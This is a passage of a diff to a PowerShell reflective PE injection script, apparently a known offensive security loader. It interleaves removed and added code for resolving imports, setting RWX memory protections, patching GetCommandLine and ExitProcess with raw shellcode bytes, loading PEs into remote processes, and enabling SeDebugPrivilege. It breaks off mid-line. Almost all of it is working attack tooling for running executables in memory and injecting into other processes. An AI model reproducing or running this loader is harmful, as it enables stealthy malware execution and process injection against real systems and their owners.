= $Win32Functions.LoadLibrary.Invoke($ImportDllPath) - } - - if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero)) - { - throw "Error importing DLL, DLLName: $ImportDllPath" - } - - #Get the first thunk, then loop through all of them - [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk) - [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk - [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr]) - - while ($OriginalThunkRefVal -ne [IntPtr]::Zero) - { - $LoadByOrdinal = $false - [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero - #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit - # If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint - # and doing the comparison, just see if it is less than 0 - [IntPtr]$NewThunkRef = [IntPtr]::Zero - if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0) - { - [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal - $LoadByOrdinal = $true - } - elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0) - { - [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal - $LoadByOrdinal = $true - } - else - { - [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal) - $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])) - $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr) - $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName) - } - - if ($RemoteLoading -eq $true) - { - [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal - } - else - { - [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr) - } - - if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero) - { - if ($LoadByOrdinal) - { - Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath" - } - else - { - Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath" - } - } + } + + #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ + Function Get-DelegateType + { + Param + ( + [OutputType([Type])] - [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false) - - $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) - [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) - [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr]) + [Parameter( Position = 0)] + [Type[]] + $Parameters = (New-Object Type[](0)), - #Cleanup - #If loading by ordinal, ProcedureNamePtr is the ordinal value and not actually a pointer to a buffer that needs to be freed - if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero)) - { - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr) - $ProcedureNamePtr = [IntPtr]::Zero - } - } - - $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)) - } - } - } - - Function Get-VirtualProtectValue - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [UInt32] - $SectionCharacteristics - ) - - $ProtectionFlag = 0x0 - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0) - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) - { - $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE - } - else - { - $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ - } - } - else - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) - { - $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY - } - else - { - $ProtectionFlag = $Win32Constants.PAGE_EXECUTE - } - } - } - else - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) - { - $ProtectionFlag = $Win32Constants.PAGE_READWRITE - } - else - { - $ProtectionFlag = $Win32Constants.PAGE_READONLY - } - } - else - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) - { - $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY - } - else - { - $ProtectionFlag = $Win32Constants.PAGE_NOACCESS - } - } - } - - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0) - { - $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE - } - - return $ProtectionFlag - } - - Function Update-MemoryProtectionFlags - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [System.Object] - $PEInfo, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Constants, - - [Parameter(Position = 3, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) - { - [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) - $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) - [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress) - - [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics - [UInt32]$SectionSize = $SectionHeader.VirtualSize - - [UInt32]$OldProtectFlag = 0 - Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null - $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag) - if ($Success -eq $false) - { - Throw "Unable to change memory protection" - } - } - } - - #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE - #Returns an object with addresses to copies of the bytes that were overwritten (and the count) - Function Update-ExeFunctions - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [System.Object] - $PEInfo, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Constants, - - [Parameter(Position = 3, Mandatory = $true)] - [String] - $ExeArguments, - - [Parameter(Position = 4, Mandatory = $true)] - [IntPtr] - $ExeDoneBytePtr - ) - - #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state. - $ReturnArray = @() - - $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) - [UInt32]$OldProtectFlag = 0 - - [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll") - if ($Kernel32Handle -eq [IntPtr]::Zero) - { - throw "Kernel32 handle null" - } - - [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll") - if ($KernelBaseHandle -eq [IntPtr]::Zero) - { - throw "KernelBase handle null" - } - - ################################################# - #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it. - # We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want. - $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) - $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) - - [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA") - [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW") - - if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero) - { - throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)" - } - - #Prepare the shellcode - [Byte[]]$Shellcode1 = @() - if ($PtrSize -eq 8) - { - $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8 - } - $Shellcode1 += 0xb8 - - [Byte[]]$Shellcode2 = @(0xc3) - $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length - - - #Make copy of GetCommandLineA and GetCommandLineW - $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) - $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) - $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null - $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null - $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize) - $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize) - - #Overwrite GetCommandLineA - [UInt32]$OldProtectFlag = 0 - $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) - if ($Success = $false) - { - throw "Call to VirtualProtect failed" - } - - $GetCommandLineAAddrTemp = $GetCommandLineAAddr - Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp - $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false) - $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize - Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp - - $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null - - - #Overwrite GetCommandLineW - [UInt32]$OldProtectFlag = 0 - $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) - if ($Success = $false) - { - throw "Call to VirtualProtect failed" - } - - $GetCommandLineWAddrTemp = $GetCommandLineWAddr - Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp - $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false) - $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize - Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp - - $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null - ################################################# - - - ################################################# - #For C++ stuff that is compiled with visual studio as "multithreaded DLL", the above method of overwriting GetCommandLine doesn't work. - # I don't know why exactly.. But the msvcr DLL that a "DLL compiled executable" imports has an export called _acmdln and _wcmdln. - # It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the - # argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported. - $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" ` - , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll") - - foreach ($Dll in $DllList) - { - [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll) - if ($DllHandle -ne [IntPtr]::Zero) - { - [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln") - [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln") - if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero) - { - "Error, couldn't find _wcmdln or _acmdln" - } - - $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) - $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) - - #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state - $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr]) - $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr]) - $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) - $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false) - $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize) - $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize) - - $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) - if ($Success = $false) - { - throw "Call to VirtualProtect failed" - } - [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false) - $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null - - $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) - if ($Success = $false) - { - throw "Call to VirtualProtect failed" - } - [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false) - $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null - } - } - ################################################# - - - ################################################# - #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits. - - $ReturnArray = @() - $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process - - #CorExitProcess (compiled in to visual studio c++) - [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll") - if ($MscoreeHandle -eq [IntPtr]::Zero) - { - throw "mscoree handle null" - } - [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess") - if ($CorExitProcessAddr -eq [IntPtr]::Zero) - { - Throw "CorExitProcess address not found" - } - $ExitFunctions += $CorExitProcessAddr - - #ExitProcess (what non-managed programs use) - [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess") - if ($ExitProcessAddr -eq [IntPtr]::Zero) - { - Throw "ExitProcess address not found" - } - $ExitFunctions += $ExitProcessAddr - - [UInt32]$OldProtectFlag = 0 - foreach ($ProcExitFunctionAddr in $ExitFunctions) - { - $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr - #The following is the shellcode (Shellcode: ExitThread.asm): - #32bit shellcode - [Byte[]]$Shellcode1 = @(0xbb) - [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb) - #64bit shellcode (Shellcode: ExitThread.asm) - if ($PtrSize -eq 8) - { - [Byte[]]$Shellcode1 = @(0x48, 0xbb) - [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb) - } - [Byte[]]$Shellcode3 = @(0xff, 0xd3) - $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length - - [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread") - if ($ExitThreadAddr -eq [IntPtr]::Zero) - { - Throw "ExitThread address not found" - } - - $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) - if ($Success -eq $false) - { - Throw "Call to VirtualProtect failed" - } - - #Make copy of original ExitProcess bytes - $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) - $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null - $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize) - - #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then - # call ExitThread - Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp - $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false) - $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize - Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp - $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false) - $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize - Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp - - $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null - } - ################################################# - - Write-Output $ReturnArray - } - - - #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count) - # It copies Count bytes from Source to Destination. - Function Copy-ArrayOfMemAddresses - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Array[]] - $CopyInfo, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Constants - ) - - [UInt32]$OldProtectFlag = 0 - foreach ($Info in $CopyInfo) - { - $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) - if ($Success -eq $false) - { - Throw "Call to VirtualProtect failed" - } - - $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null - - $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null - } - } - - - ##################################### - ########## FUNCTIONS ########### - ##################################### - Function Get-MemoryProcAddress - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [IntPtr] - $PEHandle, - - [Parameter(Position = 1, Mandatory = $true)] - [String] - $FunctionName - ) - - $Win32Types = Get-Win32Types - $Win32Constants = Get-Win32Constants - $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants - - #Get the export table - if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0) - { - return [IntPtr]::Zero - } - $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress) - $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY) - - for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++) - { - #AddressOfNames is an array of pointers to strings of the names of the functions exported - $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))) - $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32])) - $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr) - - if ($Name -ceq $FunctionName) - { - #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions - # which contains the offset of the function in to the DLL - $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))) - $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16]) - $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))) - $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32]) - return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset) - } - } - - return [IntPtr]::Zero - } - - - Function Invoke-MemoryLoadLibrary - { - Param( - [Parameter( Position = 0, Mandatory = $true )] - [Byte[]] - $PEBytes, - - [Parameter(Position = 1, Mandatory = $false)] - [String] - $ExeArgs, - - [Parameter(Position = 2, Mandatory = $false)] - [IntPtr] - $RemoteProcHandle, + [Parameter( Position = 1 )] + [Type] + $ReturnType = [Void] + ) - [Parameter(Position = 3)] - [Bool] - $ForceASLR = $false - ) - - $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) - - #Get Win32 constants and functions - $Win32Constants = Get-Win32Constants - $Win32Functions = Get-Win32Functions - $Win32Types = Get-Win32Types - - $RemoteLoading = $false - if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero)) - { - $RemoteLoading = $true - } - - #Get basic PE information - Write-Verbose "Getting basic PE information from the file" - $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types - $OriginalImageBase = $PEInfo.OriginalImageBase - $NXCompatible = $true - if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) - { - Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue - $NXCompatible = $false - } - - - #Verify that the PE and the current process are the same bits (32bit or 64bit) - $Process64Bit = $true - if ($RemoteLoading -eq $true) - { - $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") - $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process") - if ($Result -eq [IntPtr]::Zero) - { - Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit" - } - - [Bool]$Wow64Process = $false - $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process) - if ($Success -eq $false) - { - Throw "Call to IsWow64Process failed" - } - - if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4))) - { - $Process64Bit = $false - } - - #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly - $PowerShell64Bit = $true - if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8) - { - $PowerShell64Bit = $false - } - if ($PowerShell64Bit -ne $Process64Bit) - { - throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process" - } - } - else - { - if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8) - { - $Process64Bit = $false - } - } - if ($Process64Bit -ne $PEInfo.PE64Bit) - { - Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)" - } - - - #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address - Write-Verbose "Allocating memory for the PE and write its headers to memory" - - #ASLR check - [IntPtr]$LoadAddr = [IntPtr]::Zero - $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE - if ((-not $ForceASLR) -and (-not $PESupportsASLR)) - { - Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue - [IntPtr]$LoadAddr = $OriginalImageBase - } - elseif ($ForceASLR -and (-not $PESupportsASLR)) + $Domain = [AppDomain]::CurrentDomain + $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) + $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) + $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') + $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) + $MethodBuilder.SetImplementationFlags('Runtime, Managed') + + Write-Output $TypeBuilder.CreateType() + } + + + #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ + Function Get-ProcAddress + { + Param + ( + [OutputType([IntPtr])] + + [Parameter( Position = 0, Mandatory = $True )] + [String] + $Module, + + [Parameter( Position = 1, Mandatory = $True )] + [String] + $Procedure + ) + + # Get a reference to System.dll in the GAC + $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | + Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } + $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') + # Get a reference to the GetModuleHandle and GetProcAddress methods + $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') + $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') + # Get a handle to the module specified + $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) + $tmpPtr = New-Object IntPtr + $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) + + # Return the address of the function + Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) + } + + Function Enable-SeDebugPrivilege + { + Param( + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Types, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Constants + ) + + [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke() + if ($ThreadHandle -eq [IntPtr]::Zero) { - Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a 